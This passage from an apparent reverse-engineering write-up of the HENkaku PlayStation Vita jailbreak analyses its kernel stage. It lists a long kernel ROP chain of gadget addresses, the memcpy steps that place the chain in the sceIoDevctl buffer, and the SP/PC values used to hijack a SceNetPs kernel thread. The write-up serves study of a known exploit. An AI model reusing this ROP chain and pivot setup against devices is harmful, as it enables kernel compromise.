0x00(x_stack + 0x00008BBC) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BC0) = scesysmem_base + 0x0001614D
0x00(x_stack + 0x00008BC4) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008BC8) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BCC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BD0) = scesysmem_base + 0x000000AF
0x00(x_stack + 0x00008BD4) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008BD8) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008BDC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BE0) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008BE4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BE8) = scesysmem_base + 0x00001347
0x00(x_stack + 0x00008BEC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BF0) = scesysmem_base + 0x000000B9
0x00(x_stack + 0x00008BF4) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BF8) = scesysmem_base + 0x00001347
0x00(x_stack + 0x00008BFC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C00) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C04) = kern_code
0x00(x_stack + 0x00008C08) = scesysmem_base + 0x0001CB95
0x00(x_stack + 0x00008C0C) = scesysmem_base + 0x0001EA93
0x00(x_stack + 0x00008C10) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008C14) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C18) = scesysmem_base + 0x000209D7
0x00(x_stack + 0x00008C1C) = scesysmem_base + 0x000209D3
0x00(x_stack + 0x00008C20) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008C24) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C28) = scesysmem_base + 0x0001BAF5
0x00(x_stack + 0x00008C2C) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C30) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C34) = scesysmem_base + 0x0000652B
0x00(x_stack + 0x00008C38) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C3C) = scesysmem_base + 0x0001BAF5
0x00(x_stack + 0x00008C40) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
0x00(x_stack + 0x00008C48) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C5C) = 0x00000040
0x00(x_stack + 0x00008C50) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008C54) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C58) = scesysmem_base + 0x0000652B
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C60) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008C64) = 0x00000040
0x00(x_stack + 0x00008C68) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008C6C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008C70) = scesysmem_base + 0x0001D9EB
0x00(x_stack + 0x00008C74) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008C78) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008C7C) = scesysmem_base + 0x0001D8DB
0x00(x_stack + 0x00008C80) = 0x00000038
0x00(x_stack + 0x00008C84) = scesysmem_base + 0x000000AB
0x00(x_stack + 0x00008C88) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008C8C) = scesysmem_base + 0x0002328B
0x00(x_stack + 0x00008C90) = scesysmem_base + 0x00022FCD
0x00(x_stack + 0x00008C94) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008C98) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008C9C) = scesysmem_base + 0x0002A117
0x00(x_stack + 0x00008CA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CA4) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008CA8) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008CAC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CB0) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CB4) = scesysmem_base + 0x0001BF1F
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
0x00(x_stack + 0x00008CBC) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000240
0x00(x_stack + 0x00008CC4) = scesysmem_base + 0x00022A49
0x00(x_stack + 0x00008CC8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CCC) = scesysmem_base + 0x00003D73
0x00(x_stack + 0x00008CD0) = 0x00000000
0x00(x_stack + 0x00008CD4) = scesysmem_base + 0x000021FD
0x00(x_stack + 0x00008CD8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CDC) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008CE0) = scesysmem_base + 0x00000AE1
0x00(x_stack + 0x00008CE4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CE8) = scesysmem_base + 0x0002A117
0x00(x_stack + 0x00008CEC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008CF0) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008CF4) = scesysmem_base + 0x00000067
0x00(x_stack + 0x00008CF8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008CFC) = scesysmem_base + 0x0001BF47
0x00(x_stack + 0x00008D00) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D04) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008D08) = scesysmem_base + 0x0000AF33
0x00(x_stack + 0x00008D0C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D10) = scesysmem_base + 0x0001D9EB
0x00(x_stack + 0x00008D14) = kern_next_payload
0x00(x_stack + 0x00008D18) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008D1C) = scesysmem_base + 0x0000EA73
0x00(x_stack + 0x00008D20) = scesysmem_base + 0x0000039B
0x00(x_stack + 0x00008D24) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
0x00(x_stack + 0x00008D2C) = 0x08106803
0x00(x_stack + 0x00008D30) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008D34) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D38) = scesysmem_base + 0x00000433
0x00(x_stack + 0x00008D3C) = scesysmem_base + 0x000233D3
0x00(x_stack + 0x00008D40) = scesysmem_base + 0x000150A3
0x00(x_stack + 0x00008D44) = 0x00000000
0x00(x_stack + 0x00008D48) = scesysmem_base + 0x0000A74D
0x00(x_stack + 0x00008D4C) = scesysmem_base + 0x00000000
0x00(x_stack + 0x00008D50) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D54) = scesysmem_base + 0x0001BF1F
0x00(x_stack + 0x00008D58) = 0x00000200
0x00(x_stack + 0x00008D5C) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D60) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008D64) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008D68) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008D6C) = scesysmem_base + 0x00022FCD
0x00(x_stack + 0x00008D70) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008D74) = scesysmem_base + 0x00000853
0x00(x_stack + 0x00008D78) = scesysmem_base + 0x00011C5F
Now we copy the chain from the stack into the buffer that's being sent through sceIoDevctl:
  •     // Copy kernel ROP chain
        memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);
        // Copy the first 0x400 bytes of "obfuscated" data
        // and append them at the bottom of the ROP chain
        memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);
And so, the final input buffer will look like this:
  •     // SceSysmem address
        // Unknown pointer written right on top of the input buffer
        0x00(x_stack + 0x00007444) = scesysmem_base + 0x0001E460
        // Kernel ROP chain
        0x00(x_stack + 0x00007448) = 0xXXXXXXXX;
        ...
        0x00(x_stack + 0x00007734) = 0xXXXXXXXX;
        // A few NULLs for padding
        0x00(x_stack + 0x00007738) = 0x00000000;
        0x00(x_stack + 0x0000773C) = 0x00000000;
        0x00(x_stack + 0x00007740) = 0x00000000;
        // Encrypted kernel code
        // Only the first 0x100 bytes will fit in the buffer
        0x00(x_stack + 0x00007744) = 0xXXXXXXXX;
        ...
        0x00(x_stack + 0x00007B44) = 0xXXXXXXXX;
Finally, we must craft a buffer that holds our ROP chain's SP and PC. This is the buffer we feed to the SceNet exploit:
  •     // Set kernel thread SP, PC, UNK
        0x00(x_stack + 0x0000884C) = sceiofilemgr_stack_base + 0x000006F8 + 0x00000004      // SP
        0x00(x_stack + 0x00008850) = scesysmem_base + 0x00000347                            // PC
        0x00(x_stack + 0x00008858) = sceiofilemgr_stack_base + 0x000006DC                   // UNK
When the SceNet exploit finishes, we should have hijacked a kernel thread inside the SceNetPs module and overwritten its stack contents with our own.
This results in the kernel jumping to scesysmem_base + 0x00000347 (which is very likely a POP {PC} gadget) and executing our ROP chain at sceiofilemgr_stack_base + 0x000006F8 + 0x00000004 (which translates to kern_rop + 0x04).
  
To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the rest of HENkaku's code.


Next up, stage 3!
